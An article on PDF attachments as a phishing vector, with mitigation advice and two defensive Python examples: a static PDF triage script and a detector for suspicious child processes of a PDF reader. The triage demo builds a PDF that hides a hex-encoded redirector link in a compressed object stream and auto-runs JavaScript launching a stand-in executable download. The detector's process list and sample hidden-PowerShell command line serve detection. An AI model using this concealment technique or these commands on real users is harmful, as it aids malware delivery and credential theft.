
What makes PDF files attractive to threat actors?


In recent months, there has been a rising trend in threat actors employing Portable Document Format (PDF) documents to gain access through email attacks. While the exploitation of PDF files as a malicious tool is not a new tactic, its prevalence has surged as cybercriminals continue to refine their methods to evade traditional security measures.

In a blog published on April 4, cyber-security firm Check Point reported that 22% of malicious email attachments are now PDFs, a significant share given that 68% of attacks originate through email. This is concerning because over 400 billion PDF files were opened last year and 87% of organisations use PDFs as a standard format, making them ideal vehicles for concealing malicious content.

PDF files as a lure used by threat actors

Developed by Adobe in 1992, PDF is widely used and accepted as a standard format for sharing and distributing information among users and organisations, and most modern devices and operating systems ship with a built-in PDF reader. This ubiquity makes PDFs an attractive initial access vector: they can be distributed easily regardless of platform, which results in higher phishing click rates than other methods.


Trustworthiness is another reason. PDF documents are often perceived as trustworthy and safe to open, particularly when they appear to come from a trusted source, which makes it easier for attackers to trick victims into opening malicious PDF documents, researchers believe.

Furthermore, PDF documents are routinely used for legitimate purposes and can contain complex data structures that are difficult for security teams and software to analyse and detect. Prateek Bhajanka, CEO and founder of the IT security consulting firm Field CISO Advisory, said that this complexity creates a CAPTCHA-like effect: documents appear normal to human users while being difficult for automated security systems to analyse correctly.

What techniques are cyber-goons employing?

In the past, attackers relied on vulnerabilities in PDF readers, tracked as Common Vulnerabilities and Exposures (CVEs), to compromise the reader software itself. However, as PDF readers have improved their security, particularly browsers, which now open PDFs by default, this method has become less effective. Consequently, cybercriminals have shifted tactics to rely more on social engineering and hidden malicious links, making these attacks even harder to detect, explained Elad Pas, Head of R&D, and Sharon Ben Moshe, Malware Analyst, at Check Point Software, the authors of the blog.


For example, one of the most common attack methods involves embedding malicious links within PDFs. These files often mimic trusted documents from well-known brands such as Amazon, DocuSign, or Acrobat Reader. When recipients click the links, they are redirected to phishing sites or malware-laden downloads.

Unlike traditional exploits that rely on software vulnerabilities, link-based PDF attacks depend on human interaction rather than on exploit code, and that is precisely what makes them effective: automated security solutions struggle to judge a link the way a human would, so such files are harder to flag. According to the researchers, threat actors frequently modify the links, images, and content within PDFs to evade security tools that rely on static signatures or URL reputation databases.

Additionally, attackers may use encryption and hidden objects within PDFs to obscure malicious code, complicating the analysis of the file’s true contents.
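To make the techniques above concrete, here is an added example (not code from the Check Point blog or from this article) of a static triage script for a suspicious PDF. It locates action keys such as /URI, /JavaScript and /OpenAction, decodes both literal and hex-encoded strings, inflates Flate-compressed object streams so that an annotation hidden inside one is still seen, notes whether the file is encrypted, and classifies every extracted URL as a shortener, a redirector or a direct link, which also covers the shortened-link and redirect-service advice given under mitigation below. The sample PDF is constructed inline for the demo; the redirector paths, shortener hosts and the query-parameter names used to unwrap a redirector are assumptions, not an exhaustive list.

```python
import re
import zlib
from urllib.parse import parse_qs, unquote, urlparse

# Keys that let a PDF act on its own or reach the network. Presence is a triage
# signal, not proof of malice: forms and portfolios use several of them legitimately.
ACTION_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
               b"/SubmitForm", b"/EmbeddedFile", b"/URI")
# Assumed redirector (host -> path prefix) patterns and shortener hosts; illustrative only.
REDIRECTORS = {"www.bing.com": "/ck/a", "www.linkedin.com": "/safety/go", "www.google.com": "/amp/"}
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "lnkd.in"}
ESCAPES = {0x6E: 10, 0x72: 13, 0x74: 9, 0x62: 8, 0x66: 12}   # \n \r \t \b \f


def _literal(data: bytes, i: int) -> bytes:
    """Decode the PDF literal string at data[i] == b'(' : balanced parens, backslash escapes."""
    depth, out, j = 0, bytearray(), i
    while j < len(data):
        c = data[j]
        if c == 0x5C and j + 1 < len(data):        # backslash: \( \) \\ or a named escape
            out.append(ESCAPES.get(data[j + 1], data[j + 1]))
            j += 2
            continue
        depth += (c == 0x28) - (c == 0x29)         # unescaped parens must balance
        if depth == 0:
            break
        if not (c == 0x28 and depth == 1):         # drop only the outermost '('
            out.append(c)
        j += 1
    return bytes(out)


def string_values(data: bytes, key: bytes):
    """Yield the decoded value of every `key (literal)` or `key <hex>` pair; hex strings hide URLs from grep."""
    for m in re.finditer(re.escape(key) + rb"(?![A-Za-z])\s*", data):
        i = m.end()
        if data[i:i + 1] == b"(":
            yield _literal(data, i)
        elif data[i:i + 1] == b"<" and data[i + 1:i + 2] != b"<":
            h = data[i + 1:data.find(b">", i)].decode("ascii", "ignore").strip()
            yield bytes.fromhex(h + "0" if len(h) % 2 else h)


def inflate_object_streams(data: bytes) -> bytes:
    """Append the body of every FlateDecode'd /ObjStm with a direct /Length, so hidden objects get scanned too."""
    extra = []
    for m in re.finditer(rb"/Type\s*/ObjStm(.*?)>>\s*stream\r?\n", data, re.S):
        length = re.search(rb"/Length\s+(\d+)", m.group(1))
        if length:
            try:
                extra.append(zlib.decompress(data[m.end():m.end() + int(length.group(1))]))
            except zlib.error:
                pass                               # not Flate, or corrupt
    return data + b"\n" + b"\n".join(extra)


def classify_url(url: str) -> str:
    """'shortener', 'redirector' or 'direct', judged from host and path alone."""
    p = urlparse(url)
    host = p.netloc.lower()
    if host in SHORTENERS:
        return "shortener"
    if host in REDIRECTORS and p.path.startswith(REDIRECTORS[host]):
        return "redirector"
    return "direct"


def unwrap(url: str) -> str:
    """Best effort: recover the destination a redirector carries in its query (assumed parameter names)."""
    q = parse_qs(urlparse(url).query)
    for name in ("u", "url", "q"):
        if name in q:
            return unquote(q[name][0])
    return url


def triage(pdf: bytes) -> dict:
    """Static triage: risky keys, encryption, object streams and every URL found."""
    data = inflate_object_streams(pdf)
    keys = sorted(k.decode() for k in ACTION_KEYS
                  if re.search(re.escape(k) + rb"(?![A-Za-z])", data))
    urls = [u.decode("latin-1") for u in string_values(data, b"/URI")]
    js = b"\n".join(string_values(data, b"/JS")).decode("latin-1")
    urls += re.findall(r"https?://[^\s\"')]+", js)     # URLs reached via script
    return {"encrypted": b"/Encrypt" in data, "object_streams": b"/ObjStm" in pdf,
            "action_keys": keys, "urls": [(u, classify_url(u), unwrap(u)) for u in urls]}


def build_sample_pdf() -> bytes:
    """Constructed demo file (not a real sample): a link annotation with a hex-encoded redirector
    URL hidden in a Flate-compressed object stream, plus an /OpenAction that runs JavaScript."""
    uri = b"https://www.bing.com/ck/a?u=https%3A%2F%2Fexample.test%2Fsign-in"
    header = b"4 0\n"                                  # object 4 at offset 0 in the stream
    body = (b"<< /Type /Annot /Subtype /Link /Rect [72 700 300 720] "
            b"/A << /S /URI /URI <" + uri.hex().encode() + b"> >> >>")
    packed = zlib.compress(header + body)
    objstm = (b"6 0 obj << /Type /ObjStm /N 1 /First %d /Length %d /Filter /FlateDecode >>\n"
              b"stream\n" % (len(header), len(packed)) + packed + b"\nendstream\nendobj\n")
    js = b'app.launchURL("https://example.test/dl/invoice.exe", true);'
    return (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj\n"
            b"5 0 obj << /S /JavaScript /JS (" + js + b") >> endobj\n" + objstm
            + b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

Running `triage(build_sample_pdf())` reports the /JS, /JavaScript, /OpenAction and /URI keys, the object stream, and two URLs: the Bing redirector (unwrapped to its example.test destination) from the hidden annotation, and the direct download that the JavaScript would open. A plain `grep` for the URL would have found neither, since one is hex-encoded inside a compressed stream and the other lives in script.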

Mitigating the risks of PDF attacks


As cyber-attackers continuously enhance their methods, organisations and individuals need to adopt proactive strategies to reduce risk. “Passive security is no longer enough. While prevention is essential, rapid response is critical,” said John Shier, Field CTO of Threat Intelligence at Sophos, explaining the shift in the cyber-attack landscape.

As noted by Pas and Ben Moshe, it is crucial always to verify the sender's identity. “Even if a PDF appears to be authentic, it is important to confirm the sender's email address. Cybercriminals frequently impersonate reputable brands or colleagues to deceive recipients into trusting the document,” the researchers said.

Users should be wary of shortened links and of links that pass through redirect services such as Bing, LinkedIn, or Google AMP, the researchers said. They should also use a secure PDF viewer, as modern browsers and PDF readers typically incorporate built-in security features, keep these tools updated, and avoid opening PDFs in obscure or outdated software.


Disabling JavaScript in PDF viewers is also important: if your PDF reader supports JavaScript (many do), turn it off unless it is genuinely needed, to minimise the risk of script-based attacks. At the gateway level

IT administrators must ensure that systems and security tools are kept up to date. Regular updates to the operating system, browser, and antivirus software are essential, as patches often address vulnerabilities that malicious PDFs could exploit, according to Bhajanka.

According to him, “CISOs must focus on behavioural-based protection on endpoints, especially for PDF files, which involves continuously monitoring system activities for unusual patterns, which can indicate malicious activity, and then taking action to block or remediate threats.” This method is effective against zero-day threats, fileless malware, and advanced persistent threats (APTs) that bypass signature-based detection.
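As an added example of the behaviour-based endpoint monitoring Bhajanka describes (illustrative code, not his or the article's), the following flags a PDF reader that ends up spawning a scripting or download utility. It follows the parent chain so that a reader starting cmd.exe, which in turn starts powershell.exe, is caught as well as a direct child. The process events are constructed Sysmon-style records, and the lists of reader and tool names are assumptions that a real detection rule would tune to its environment.

```python
import ntpath

# Assumed process names; a production rule would tune both sets to the estate.
PDF_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "sumatrapdf.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                       "curl.exe", "bitsadmin.exe", "msiexec.exe"}

# Constructed Sysmon-style process-creation records (not real telemetry).
EVENTS = [
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
     "cmdline": r'"AcroRd32.exe" C:\Users\alice\Downloads\invoice.pdf'},
    {"pid": 4110, "ppid": 4100, "image": r"C:\Program Files\Adobe\Acrobat Reader\AdobeCollabSync.exe",
     "cmdline": "AdobeCollabSync.exe"},          # benign helper the reader normally starts
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell -w hidden -c "Start-Process $env:TEMP\update.exe"'},
    {"pid": 4130, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Start-Process $env:TEMP\update.exe"'},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]


def _name(path: str) -> str:
    """Lower-cased file name of an image path (Windows separators)."""
    return ntpath.basename(path).lower()


def reader_spawn_chains(events, max_depth: int = 3):
    """One alert per suspicious process whose ancestry, within max_depth hops,
    reaches a PDF reader. Walking the chain catches reader -> cmd -> powershell,
    a pattern a rule that only inspects the direct parent would miss."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _name(e["image"]) not in SUSPICIOUS_CHILDREN:
            continue
        chain, parent, hops = [e], by_pid.get(e["ppid"]), 0
        while parent is not None and hops < max_depth:
            chain.append(parent)
            if _name(parent["image"]) in PDF_READERS:
                alerts.append({"pid": e["pid"], "cmdline": e["cmdline"],
                               "chain": " <- ".join(_name(x["image"]) for x in chain)})
                break
            parent, hops = by_pid.get(parent["ppid"]), hops + 1
    return alerts


if __name__ == "__main__":
    for alert in reader_spawn_chains(EVENTS):
        print(alert["chain"], "|", alert["cmdline"])
```

On the constructed events this raises two alerts, for cmd.exe and for the powershell.exe it launched, while the reader's own helper process and the shell the user opened from Explorer are left alone. The same ancestry walk applies to browsers that render PDFs, with a larger allow-list because browsers legitimately spawn far more child processes.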

